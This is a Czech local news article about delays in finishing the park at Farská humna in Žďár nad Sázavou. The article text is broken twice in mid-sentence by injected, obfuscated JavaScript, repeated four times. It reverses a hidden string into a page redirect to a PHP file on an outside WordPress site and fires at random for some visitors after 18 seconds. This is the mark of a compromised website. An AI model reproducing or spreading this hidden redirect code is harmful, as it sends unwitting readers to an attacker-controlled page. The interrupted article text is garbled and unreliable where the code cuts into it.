Žďár nad Sázavou, zdar nad sazavou, aktuality, Farčata
Rainbow page separator

V parku budou položeny kameny

Pondělí, 3. února 2014

Žďár nad Sázavou / Na kompletní dokončení parku na Farských humnech si budou muset obyvatelé Žďáru nad Sázavou ještě nějakou dobu počkat. Pro lokalitu je schválen regulační plán, který řeší konkrétní umístění chodníků, takže cestičky, které si tam lidé vyšlapali ve snaze najít si tu nejvhodnější trasu, nemohou být jednoduše zlegalizovány jako plnohodnotné chodníky. Předtím by bylo nutné provést změnu regulačního plánu, což je záleži["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tost nejméně dvou let projednávání a schvalování. Prozatím alespoň v nejfrekven["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovanějším úseku, což je spojení Farských humen s ulicí Nábřežní, bude žďárským komunálním odborem zajištěno položení plochých kamenů. Dokončení pojízdného chodníku na Farských humnech, který nebude bránit průjezdu územím, je spolu s další výsadbou zeleně a vybudováním hřiště pro děti součástí II. etapy výstavby městského parku. Pro tu je zajištěno stavební povolení, avšak realizovat se bude v případě obdržení dotace.